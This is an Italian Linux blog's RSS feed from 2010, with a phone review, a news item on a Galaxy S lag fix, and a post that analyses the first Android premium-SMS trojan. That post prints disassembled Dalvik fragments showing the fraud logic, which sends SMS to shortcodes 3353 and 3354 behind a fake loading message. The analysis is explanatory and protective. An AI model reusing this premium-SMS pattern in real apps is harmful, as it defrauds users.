<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2italianfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Il Portalinux - Portale di informazione su linux, free software ed open source</title> <link>http://www.ilportalinux.it</link> <description>News, how to, chicche di ogni genere su tecnologia ed open source</description> <lastBuildDate>Sat, 04 Sep 2010 11:26:40 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=abc</generator> <atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/IlPortalinux" /><feedburner:info uri="ilportalinux" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>IlPortalinux</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><feedburner:feedFlare href="http://add.my.yahoo.com/content?lg=it&amp;url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://eur.i1.yimg.com/eur.yimg.com/i/it/my/mioya1.gif">Subscribe with Mio Yahoo!</feedburner:feedFlare><feedburner:feedFlare href="http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.newsgator.com/images/ngsub1.gif">Subscribe with NewsGator</feedburner:feedFlare><feedburner:feedFlare href="http://www.bloglines.com/sub/http://feeds.feedburner.com/IlPortalinux" src="http://www.bloglines.com/images/sub_modern11.gif">Subscribe with Bloglines</feedburner:feedFlare><feedburner:feedFlare href="http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.netvibes.com/img/add2netvibes.gif">Subscribe with Netvibes</feedburner:feedFlare><feedburner:feedFlare href="http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://buttons.googlesyndication.com/fusion/add.gif">Subscribe with Google</feedburner:feedFlare><feedburner:feedFlare href="http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&amp;fileName=ATP_blu_91x17.gif">Subscribe with Pageflakes</feedburner:feedFlare><feedburner:feedFlare href="http://www.plusmo.com/add?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://plusmo.com/res/graphics/fbplusmo.gif">Subscribe with Plusmo</feedburner:feedFlare><feedburner:feedFlare href="http://www.thefreedictionary.com/_/hp/AddRSS.aspx?http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://img.tfd.com/hp/addToTheFreeDictionary.gif">Subscribe with The Free Dictionary</feedburner:feedFlare><feedburner:feedFlare href="http://www.bitty.com/manual/?contenttype=rssfeed&amp;contentvalue=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.bitty.com/img/bittychicklet_91x17.gif">Subscribe with Bitty Browser</feedburner:feedFlare><feedburner:feedFlare href="http://www.live.com/?add=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://tkfiles.storage.msn.com/x1piYkpqHC_35nIp1gLE68-wvzLZO8iXl_JMledmJQXP-XTBOLfmQv4zhj4MhcWEJh_GtoBIiAl1Mjh-ndp9k47If7hTaFno0mxW9_i3p_5qQw">Subscribe with Live.com</feedburner:feedFlare><feedburner:feedFlare href="http://mix.excite.eu/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://image.excite.co.uk/mix/addtomix.gif">Subscribe with Excite MIX</feedburner:feedFlare><feedburner:feedFlare href="http://www.webwag.com/wwgthis.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.webwag.com/images/wwgthis.gif">Subscribe with Webwag</feedburner:feedFlare><feedburner:feedFlare href="http://www.podcastready.com/oneclick_bookmark.php?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.podcastready.com/images/podcastready_button.gif">Subscribe with Podcast Ready</feedburner:feedFlare><feedburner:feedFlare href="http://www.wikio.com/subscribe?url=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.wikio.com/shared/img/add2wikio.gif">Subscribe with Wikio</feedburner:feedFlare><feedburner:feedFlare href="http://www.dailyrotation.com/index.php?feed=http%3A%2F%2Ffeeds.feedburner.com%2FIlPortalinux" src="http://www.dailyrotation.com/rss-dr2.gif">Subscribe with Daily Rotation</feedburner:feedFlare><item><title>Test Sony Ericsson X10 Mini Pro</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/Uk7eE23yrX4/test-sony-ericsson-x10-mini-pro</link> <comments>http://www.ilportalinux.it/test-sony-ericsson-x10-mini-pro#comments</comments> <pubDate>Sat, 04 Sep 2010 08:41:48 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Android]]></category> <category><![CDATA[Sony Ericcson]]></category> <category><![CDATA[Telefonia]]></category> <category><![CDATA[pro]]></category> <category><![CDATA[recensione]]></category> <category><![CDATA[sony ericsson]]></category> <category><![CDATA[test]]></category> <category><![CDATA[x10 mini]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1993</guid> <description><![CDATA[Prima di cominciare è doverosa una premessa: l&#8217;articolo che leggerete non è una &#8220;marketta&#8221; non sono stato pagato, ne ho ottenuto alcun beneficio dai test effettuati. Il telefono dovrò restituirlo e non ho ricevuto gadget, sconti o niente di particolare come regalo. La recensione che...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/PGuh9lT0aXEOecyXrRqz9_YtRCQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/PGuh9lT0aXEOecyXrRqz9_YtRCQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/PGuh9lT0aXEOecyXrRqz9_YtRCQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/PGuh9lT0aXEOecyXrRqz9_YtRCQ/1/di" border="0" ismap="true"></img></a></p><blockquote><p>Prima di cominciare è doverosa una premessa: l&#8217;articolo che leggerete non è una &#8220;marketta&#8221; non sono stato pagato, ne ho ottenuto alcun beneficio dai test effettuati. Il telefono dovrò restituirlo e non ho ricevuto gadget, sconti o niente di particolare come regalo. La recensione che leggerete sarà ovviamente dettata dai miei gusti soggettivi, ma senza alterazioni dovute ad accordi precedenti.</p></blockquote><p><span
id="more-1993"></span>Chi segue questo blog avrà sicuramente letto che poco prima delle ferie <a
href="http://www.ilportalinux.it/messaggi-che-ti-rallegrano-la-giornata" target="_blank">sono stato contattato</a> da euronics per il test di un Sony Ericsson X10 Mini Pro. Se può interessarvi Selene ha <a
href="http://blog.armandoleotta.com/2010/08/sony-ericsson-x10-mini-recensione-di-un-piccolo-grande-androide-ovvero-appunti-sparsi-di-settimane-di-uso-quotidiano/" target="_blank">recensito</a> prima di me la versione precedente ossia x10 mini [e basta], che è uguale al dispositivo che ho provato io, con in meno il tastierino qwerty fisico e qualche feature a livello di software.</p><p
style="text-align: center;"><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/09/Schermata-15.png" rel="lightbox[1993]"><img
class="size-medium wp-image-1995  aligncenter" title="Schermata-15" src="http://www.ilportalinux.it/wp-content/uploads/2010/09/Schermata-15-300x59.png" alt="Test Sony Ericsson X10 Mini Pro" width="300" height="59" /></a></p><p
style="text-align: center;"><h3><span
style="color: #ff0000;">Le caratteristiche:</span></h3><ul><li>CPU: Qualcomm MSM7227, 600 MHz</li><li>Dimensioni: ﻿90.0 x 52.0 x 17.0 mm</li><li>Peso: 120 gr</li><li>Dimensioni display: 240 x 320 pixels (QVGA) con 16 milioni di colori</li><li>Colorazione: Nero, Rosso, Bianco Perlato</li><li>Memoria: Interna di 128Mb, Esterna fino a 16 Gb tramite supporto MicroSD, RAM di 256 Mb</li><li>Autonomia dichiarata [tipo rete, tempo di conversazione, tempo in stand by]:<br
/><table
cellspacing="0"><tbody><tr><td>GSM/GPRS/EDGE 850/900/1800/1900</td><td>4 ore</td><td>300 ore</td><td></td></tr><tr><td>UMTS/HSPA 900/2100</td><td>3 ore 30 min</td><td>360 ore</td><td></td></tr><tr><td>UMTS/HSPA 850/1900/2100</td><td>3 ore 30 min</td><td>360 ore</td><td></td></tr><tr><td
colspan="4"><a>Tempo di ascolto della musica:</a> 17 ore 30 min</td></tr></tbody></table></li><li>Fotocamera: 5 Mpixel con flash led, autofocus e possibilità di registrazione video</li><li>Sistema operativo: Android Donut 1.6</li><li>Connettività: MicroUSB, Bluetooth 2.1, WiFi 802.11 b/g, aGPS</li><li>Supporto Flash: no</li><li>Radio: Si</li><li>Riproduzione Video: DixX, XviD, MPEG4, H.263, H.264, WMV</li><li>Riproduzione audio: MP3, e-AAC+, WMA, WMDRM, OMA DRM 2.1 con uscita jack 3,5 mm</li></ul><h3><span
style="color: #ff0000;">Prime considerazioni:</span></h3><p>L&#8217;interfaccia utente è la UXP, proprietaria sony. Bisogna innanzitutto dire che Sony Ericsson con la serie x10 mini ha puntato tutto su due parole chiavi &#8220;leggerezza&#8221; e &#8220;maneggevolezza&#8221; e devo dire che ci è riuscita, il telefono non ti accorgi nemmeno di averlo in tasca, ma anche se protetto da una custodia generosa, come quella fornitami in dotazione, non si rischia di mancare una notifica grazie alla potente vibrazione (e qui le battute infelici si sprecano <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' title="Test Sony Ericsson X10 Mini Pro Photo" /> ).</p><p>Questo X10 è un telefono entry-level tra gli android powered, e lo si capisce già dalle specifiche tecniche soprattutto per la presenza della versione 1.6 di Android (l&#8217;attuale è la 2.2 anche se la più diffusa al momento è la 2.1) ma ufficialmente Sony Ericsson ha <a
href="http://blogs.sonyericsson.com/products/2010/05/05/sony-ericsson-xperia%E2%84%A2-x10-to-get-uxp-upgrade-in-q4-2010/" target="_blank">dichiarato</a> che nell&#8217;ultimo quadrimestre di quest&#8217;anno la serie X10 vedrà l&#8217;upgrade ad Eclair (2.1), quindi questo telefono entra di diritto tra le scelte di chi vuole un telefono piccolo e che non sia troppo datato sulla dotazione software.</p><p>Per accedere al vano batteria/sim/sdcard bisogna lottare un pò con la cover posteriore, in quanto è presente una tacchetta che ci agevola la possibilità di fare leva tramite una unghia, ma il sistema di incastro è cosi robusto da indurci a forzare parecchio, dandoci l&#8217;impressione che da un momento all&#8217;altro la cover si rompa <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Test Sony Ericsson X10 Mini Pro Photo" /> ma possiamo stare tranquilli, sebbene in plastica la cover è abbastanza resistente e possiamo aprire il vano tutte le volte che vogliamo senza rompere nulla.</p><p>L&#8217;X10 Pro in più rispetto ai suoi fratelli, ha il tastierino qwerty fisico come dicevamo prima, tastierino che purtroppo si rende quasi sempre necessario a causa delle ridotte dimensioni del display; il tastierino virtuale infatti, se usato, occupa circa il 70% dello spazio, se poi ci aggiungiamo anche la barra delle notifiche e lo spazio &#8220;rubato&#8221; da altri pulsanti di servizio, viene facile immaginare come ad esempio durante la scrittura di un sms, la parte di schermo dedicata alla visione di ciò che si sta scrivendo è veramente poca.</p><p>L&#8217;apertura del dispositivo è &#8220;a slide&#8221;, bisogna far slittare una parte del telefono attraverso il lato più lungo per poter accedere al tastierino fisico, <span
style="text-decoration: line-through;">ed ho notato che il telefono <strong>non</strong> possiede un accelerometro/giroscopio, lo switch della visualizzazione in landscape o portrait avviene esclusivamente grazie al movimento a slitta</span> <em>non è vero, come mi è stato segnalato nei commenti da daniele, grazie. Nelle opzioni si può abilitare la rotazione dello schermo.</em></p><h3><span
style="color: #ff0000;">Il display e la reattività:</span></h3><p>In linea generale il display è abbastanza responsivo al tocco, anche se ho notato che soprattutto durante il &#8220;wake&#8221; (<em>quando cioè riaccendiamo il telefono dopo che è entrato in modalità stand-by</em>) il telefono fa fatica a <em>svegliarsi, </em>primo fra tutti è il pulsante on/off che abbiamo sulla parte alta del telefono e che serve appunto a <em>svegliare</em> il dispositivo dallo stand-by, dopo che lo si preme bisogna aspettare qualche istante prima di veder accendere il display tanto che io, abituato alla reattività del mio htc legend, sono stato indotto le prime volte a premere più volte il pulsante pensando di non aver esercitato abbastanza pressione, ri-mandando il telefono in stand-by senza accorgermene, inoltre la parte alta dello schermo, quella usata dalla status bar ed usata per &#8220;<em>tirare</em>&#8221; in basso la tendina delle notifiche, a volte manca qualche tocco costringendoci a dover far scorrere il nostro ditino più volte con maggior precisione, mentre c&#8217;è da dire che per tutti gli altri settori del display la reattività è ottima, l&#8217;interfaccia UXP è parecchio fluida anche se, sempre per le ridotte dimensioni, possiamo inserire un solo widget per pagina ma possiamo modificare il numero di pagine a piacimento per inserire più widget.</p><p>Molto bella l&#8217;applicazione/widget chiamata <em>timescape</em> che è l&#8217;equivalente di <em>friendstream</em> per chi conosce la Sense UI della HTC, in un solo widget abbiamo raccolti gli stream dei social network facebook e twitter, più i messaggi email ed sms, veramente comoda.</p><h3><span
style="color: #ff0000;">L&#8217;uso quotidiano:</span></h3><p>Devo ammettere che la presenza del tastierino fisico ha i suoi perchè, la scrittura degli sms, ed in generale la scrittura di tutto, è molto più veloce i tasti sono piccoli ma non troppo qundi non si rischia di premere 4 tasti per volta con il pollice.</p><p>L&#8217;audio nelle chiamate non ha difetti è abbastanza chiaro e non ci costringe a far urlare il nostro interlocutore <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Test Sony Ericsson X10 Mini Pro Photo" /></p><p>Per la produttività ho notato che è presente RoadSync Mail, un comodo strumento per sincronizzare i nostri account email via activesync sfruttando la tecnologia &#8220;direct push&#8221; per le email (ad esempio per chi in azienda usa Zimbra o Exchange), ma è possibile anche sincronizzare alla vecchia maniera normali account imap o pop.</p><p>La navigazione internet è veloce grazie al browser preinstallato che renderizza le pagine abbastanza agevolmente, purtroppo non supporta il pinch-zoom cioè la possibilità di zoomare o de-zoomare sulla pagina semplicemente &#8220;<em>pizzicando</em>&#8221; lo schermo con due dita, l&#8217;uso dei pulsanti zoom-in e zoom-out può risultare scomodo perchè molto più lento del pinch-zoom, ma non è niente di cosi grave, <span
style="text-decoration: line-through;">quello che secondo me è più grave è proprio l&#8217;assenza dell&#8217;accelerometro, che ci costringe a dover tenere aperto il tastierino per poter utilizzare il browser con visualizzazione in landscape (navigare con quello schermo cosi piccolo in modalità portrait è veramente scomodo, bisogna sempre <em>scrollare</em> la pagina in tutte le direzioni in quanto la parte visualizzata, ovviamente, è ridotta.)</span> <em>Come sopra</em></p><h3><span
style="color: #ff0000;">La fotocamera:</span></h3><p><span
style="color: #000000;">Chapeau a sony ericsson: sulla fotocamera non c&#8217;è nulla da criticare tranne, giusto per voler fare i pignoli a tutti i costi, l&#8217;autofocus che fa fatica se la composizione che abbiamo scelto non ha toni abbastanza contrastati, non riuscendo per l&#8217;appunto a mettere a fuoco [<em>ma vi ricordo che stiamo parlando di uno smartphone non di una reflex, per di più entry level quindi possiamo benissimo soprassedere su questo particolare.</em>]. </span></p><p><span
style="color: #000000;">Ma ci fa ricredere in tutte le altre situazioni, soprattutto per le foto panoramiche, dove l&#8217;autofocus <strong>è_una_scheggia,</strong> ci consente anche di mettere a fuoco oggetti molto vicini (<em>fotografia macro .ndr</em>), inoltre la fotocamera è accessibile direttamente tramite un apposito pulsantino su uno dei lati più lunghi del telefono, pulsante che ha la <strong>comoda funzione del blocco AF</strong>, quello che troviamo nelle normali macchine fotografiche; vale a dire che premendo parzialmente il pulsante la fotocamera mette a fuoco e blocca l&#8217;AF una volta finito, e poi premendo più forte per raggiungere il fine-corsa del pulsante si effettua lo scatto.</span></p><h3><span
style="color: #ff0000;">Considerazioni finali:</span></h3><p><span
style="color: #000000;">Il Sony Ericsson X10 mini pro è un buon telefono, chi cerca uno smartphone non eccessivo può puntare dritto su questo, in più viste le ridotte dimensioni è di una comodità assurda, giusto per rendere l&#8217;idea: io non sono famoso per avere una mano enorme ma riesco senza il minimo sforzo a chiudere la mano a mò di pugno con dentro il telefono <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Test Sony Ericsson X10 Mini Pro Photo" /> </span></p><p><span
style="color: #000000;">E&#8217; un telefono però che deve piacere <em>as-is</em> vale a dire che non è per smanettoni, cosi è e cosi ce lo teniamo, non ha prestazioni elevate e quindi se siamo alla ricerca di un telefono che vogliamo avere aggiornato sempre all&#8217;ultima novità è meglio che ci orientiamo su altri dispositivi di fascia alta e soprattutto alziamo il nostro budget.</span></p><p>Se invece siamo dei <em>nostalgici </em>o semplicemente dei sostenitori del tastierino fisico l&#8217;x10 mini pro è quello che fa per noi, è poco più di un telefono normale grazie all&#8217;integrazione coi social network, la possibilità di condividere al volo le nostre foto/video tramite gli stessi, la possibilità di installare applicazioni/giochi gratuite e non tramite l&#8217;android market, con ben 16 gb di archiviazione esterna è un ottimo player multimediale consentendoci di poter lasciare a casa l&#8217;ipod di turno, il tutto spendendo una cifra che non è affatto eccessiva.</p><p><span
style="color: #000000;"><br
/> </span></p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/test-sony-ericsson-x10-mini-pro" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/Uk7eE23yrX4" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/test-sony-ericsson-x10-mini-pro/feed/</wfw:commentRss> <slash:comments>16</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/test-sony-ericsson-x10-mini-pro</feedburner:origLink></item> <item><title>Android beffato da un “hello world”</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/cgYz3RPEFs8/android-beffato-da-un-hello-world</link> <comments>http://www.ilportalinux.it/android-beffato-da-un-hello-world#comments</comments> <pubDate>Wed, 11 Aug 2010 17:09:48 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Android]]></category> <category><![CDATA[Privacy leaking]]></category> <category><![CDATA[Security]]></category> <category><![CDATA[antivirus]]></category> <category><![CDATA[codice sorgente]]></category> <category><![CDATA[frode]]></category> <category><![CDATA[trojan]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1984</guid> <description><![CDATA[Da giorni si parla per la rete del primo trojan horse che ha infettato un sacco di telefoni android. D&#8217;altronde è &#8220;normale&#8221; un evento del genere, android sta avendo una crescita esponenziale quindi è plausibile che questo faccia gola ad alcuni programmatori poco ortodossi, soprattutto...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/zZ44CESCgKTwrLYzqkfZ7EXkO5s/0/da"><img src="http://feedads.g.doubleclick.net/~a/zZ44CESCgKTwrLYzqkfZ7EXkO5s/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/zZ44CESCgKTwrLYzqkfZ7EXkO5s/1/da"><img src="http://feedads.g.doubleclick.net/~a/zZ44CESCgKTwrLYzqkfZ7EXkO5s/1/di" border="0" ismap="true"></img></a></p><p>Da giorni si parla per la rete del primo <a
href="http://www.kaspersky.com/news?id=207576152" target="_blank">trojan horse</a> che ha infettato un sacco di telefoni android.</p><p><span
id="more-1984"></span>D&#8217;altronde è &#8220;<em>normale&#8221; u</em>n evento del genere, android sta avendo una crescita esponenziale quindi è plausibile che questo faccia gola ad alcuni programmatori poco<em> </em><em>ortodossi, </em>soprattutto perchè in ballo ci sono i soldi degli utenti finali.</p><p>Ma oggi non voglio parlarvi della notizia in se, quella già la sapete sicuramente, quello che voglio mostrarvi è il <strong>codice sorgente</strong> del software contenente il trojan, è incredibile constatare come il codice è poco più del classico programma d&#8217;esempio <em>hello world </em>distribuito con l&#8217;android SDK.</p><p><a
href="http://jon.oberheide.org/blog/2010/08/10/dexcode-teardown-of-the-android-sms-trojan/" target="_blank">Jon Oberheide</a> si è procurato appunto una copia di questa applicazione ed ha effettuato disassembling per capire il meccanismo del virus.</p><pre>Package: RU.apk
Package Name: org.me.androidapplication1
Permissions Requested: android.permission.SEND_SMS
Contents:
    ./classes.dex
    ./res
    ./res/drawable
    ./res/drawable/icon.png
    ./res/layout
    ./res/layout/main.xml
    ./resources.arsc
    ./AndroidManifest.xml
    ./META-INF
    ./META-INF/MANIFEST.MF
    ./META-INF/CERT.RSA
    ./META-INF/CERT.SF</pre><p>Jon dice che persino il file main.xml, che descrive il layout del pacchetto, contiene solo una TextView con scritto “<em>Hello Android from NetBeans</em>”. Dando un occhiata alle classi disassemblate si vede che:</p><pre>[000924] org.me.androidapplication1.MoviePlayer.onCreate:(Landroid/os/Bundle;)V
...
000c: invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;.canwe:()Z
000f: move-result v2
0010: if-eqz v2, 0040 // +0030</pre><p>Appena l&#8217;applicazione parte, viene subito chiamata la funzione DataHelper.canwe(), questa funzione serve al trojan horse per capire se in passato ha già effettuato l&#8217;invio di sms fraudolenti o meno, il trojan registra i suoi dati in un db sqlite chiamato &#8220;movieplayer.db&#8221; con una singola tabella &#8220;table1&#8243; ed una sola colonna &#8220;was&#8221;. Se la funzione canwe() determina in base ai dati sul db, che il trojan ha già operato in passato, viene annullata l&#8217;operazione e si salta subito alla riga <strong>0040 </strong>che invoca la funzione finish().</p><pre>0012: new-instance v9, Landroid/widget/TextView; // class@000e
0014: invoke-direct {v9, v12}, Landroid/widget/TextView;.&lt;init&gt;
0017: const-string v8, "?????????, ????????????? ?????? ? ?????????.."
0019: invoke-virtual {v9, v8}, Landroid/widget/TextView;.setText
001c: invoke-virtual {v12, v9}, Lorg/me/androidapplication1/MoviePlayer;.setContentView</pre><p>Se invece il trojan &#8220;<em>capisce</em>&#8221; di non aver agito di recente, l&#8217;applicazione restituisce all&#8217;utente un pop-up con un messaggio in russo, che tradotto molto semplicemente significa &#8220;<em>Richiesto l&#8217;accesso alla libreria video, attendere..</em>&#8220;</p><pre>001f: invoke-static {}, Landroid/telephony/SmsManager;.getDefault:()
0022: move-result-object v0
0023: const-string v1, "3353" // string@0001
0025: const-string v3, "798657" // string@0003
0027: const/4 v2, #int 0 // #0
0028: const/4 v4, #int 0 // #0
0029: const/4 v5, #int 0 // #0
002a: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage</pre><p>Mentre l&#8217;ignaro utente aspetta, invitato appunto dalla text-box, credendo che il movieplayer sta costruendo una libreria di video contenuti nel telefono, il trojan inizia a mandare SMS verso una numerazione premium di nazionalità russa, queste numerazioni premium alla fine vengono a costare molto più di un normale SMS all&#8217;utente finale. Nella parte di codice qui sopra vediamo la numerazione alla stringa <strong>v1 </strong>mentre il contenuto dell&#8217;sms è rappresentato dalla stringa <strong>v3</strong>. Quindi in base al codice qui sopra il trojan invia un sms contenente &#8220;798657&#8243; alla numerazione &#8220;3353&#8243;.</p><pre>002d: const-string v1, "3354" // string@0002
002f: const/4 v2, #int 0 // #0
0030: const/4 v4, #int 0 // #0
0031: const/4 v5, #int 0 // #0
0032: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage</pre><p>Poi viene mandato un altro sms ma alla numerazione &#8220;3354&#8243;</p><pre>0035: const-string v1, "3353" // string@0001
0037: const/4 v2, #int 0 // #0
0038: const/4 v4, #int 0 // #0
0039: const/4 v5, #int 0 // #0
003a: invoke-virtual/range {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;.sendTextMessage</pre><p>E giusto per sicurezza dopo manda <strong>un altro sms</strong> alla numerazione &#8220;3353&#8243;</p><pre>003d: invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;.was:()V
0040: invoke-virtual {v12}, Lorg/me/androidapplication1/MoviePlayer;.finish:()V
0043: return-void</pre><p>Dopo che ha finito di fare la spesa il trojan inserisce un record con valore &#8220;was&#8221; dentro l&#8217;omonima colonna della tabella &#8220;table1&#8243; del db. Questo dice al trojan, nelle future esecuzioni, di non effettuare l&#8217;invio di altri SMS premium, per evitare di destare <em>troppi sospetti.</em></p><p>Ma noi utenti italiani possiamo stare tranquilli, primo perchè l&#8217;applicazione è già scomparsa dal market, secondo perchè la numerazione per l&#8217;appunto, è Russa, ed i telefoni italiani non sono capaci di comunicare con quello shortcode per ovvi motivi [<em>le numerazioni sono a carattere nazionale.</em>]</p><p>Quindi in sostanza il tanto decantato trojan non è nulla di cosi grave, l&#8217;abbiamo visto è il classico hello world leggermente modificato, è totalmente inefficace per noi, ed in più non ha nessun tipo di codice maligno dal punto di vista della sicurezza, non trasforma il nostro telefono in bot comandabile da remoto, non esegue codice arbitrario sul sistema.</p><p>Ma è un ottimo avviso per gli utenti ed i vendor, il trojan è stato concepito come una frode, ed in quanto tale su parte degli utenti europei ha funzionato. Quindi come al solito noi utenti stiamo attenti [<em>và che rima</em>], se andando ad installare un mediaplayer vediamo che questo ci chiede di poter usare il GPS, o gli sms, o l&#8217;email o qualsiasi altro servizio che <strong>non serve</strong> ad un mediaplayer, qualche domanda facciamocela.</p><p>I vendor invece hanno un ottima occasione per studiare il codice di questi software malevoli ed architettare contromisure sempre più efficaci, e perchè no, anche per google stessa che magari dovrebbe effettuare un pò più di controlli su ciò che viene inserito all&#8217;interno dei suoi market.</p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/android-beffato-da-un-hello-world" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/cgYz3RPEFs8" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/android-beffato-da-un-hello-world/feed/</wfw:commentRss> <slash:comments>2</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/android-beffato-da-un-hello-world</feedburner:origLink></item> <item><title>Risolti i problemi di “lag” sul galaxy S, con risultati disarmanti!</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/q3RSkgi7UbI/risolti-problemi-di-lag-sul-galaxy-con-risultati-disarmanti</link> <comments>http://www.ilportalinux.it/risolti-problemi-di-lag-sul-galaxy-con-risultati-disarmanti#comments</comments> <pubDate>Tue, 10 Aug 2010 17:28:57 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Android]]></category> <category><![CDATA[News]]></category> <category><![CDATA[galaxy s]]></category> <category><![CDATA[lag fix]]></category> <category><![CDATA[samsung]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1978</guid> <description><![CDATA[A quanto pare lo staff di xda-developers ha risolto i problemi di &#8220;lag&#8221; di cui soffrono i recentissimi samsung galaxy S. La cosa è quantomeno curiosa, il telefono che -al momento- sembra essere il più potente nel campo android (e probabilmente anche in generale) soffre...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/Vkx-GzoeEJQ6snHe5H_oNEJaX9A/0/da"><img src="http://feedads.g.doubleclick.net/~a/Vkx-GzoeEJQ6snHe5H_oNEJaX9A/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/Vkx-GzoeEJQ6snHe5H_oNEJaX9A/1/da"><img src="http://feedads.g.doubleclick.net/~a/Vkx-GzoeEJQ6snHe5H_oNEJaX9A/1/di" border="0" ismap="true"></img></a></p><p>A quanto pare lo staff di xda-developers ha risolto i problemi di &#8220;lag&#8221; di cui soffrono i recentissimi samsung galaxy S.</p><p><span
id="more-1978"></span>La cosa è quantomeno curiosa, il telefono che -al momento- sembra essere il più potente nel campo android (<em>e probabilmente anche in generale</em>) soffre di problemi di latenza nell&#8217;uso di tutti i giorni, durante l&#8217;esecuzione dell&#8217;interfaccia touchwiz, l&#8217;interfaccia utente installata da samsung sui suoi dispositivi con android equipaggiato.</p><p>Adesso le cose sono cambiate, su xda è stato rilasciato -ancora in fase BETA- il &#8220;<a
href="http://forum.xda-developers.com/showthread.php?t=749495" target="_blank">lag fix</a>&#8221; un pacchetto semplicissimo da usare, lo si scarica sul proprio pc, si connette il proprio Galaxy S con la modalità <em>usb-debug</em> attivata, si lancia lo script <em>lagfixme.bat</em> e si aspetta&#8230;</p><p>Alla fine si ha il proprio telefono che letteralmente <strong>vola</strong>, come ci dimostra un benchmark effettuato da un utente che lo ha testato</p><p
style="text-align: left;"><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/08/snap20100809_151120.png" rel="lightbox[1978]"><img
class="size-full wp-image-1979 aligncenter" title="snap20100809_151120" src="http://www.ilportalinux.it/wp-content/uploads/2010/08/snap20100809_151120.png" alt="Risolti i problemi di lag sul galaxy S, con risultati disarmanti!" width="307" height="512" /></a>Si avete visto bene, le prestazioni grazie al lag-fix sono <strong>quasi il doppio</strong> di un nexus one con froyo installato!</p><p
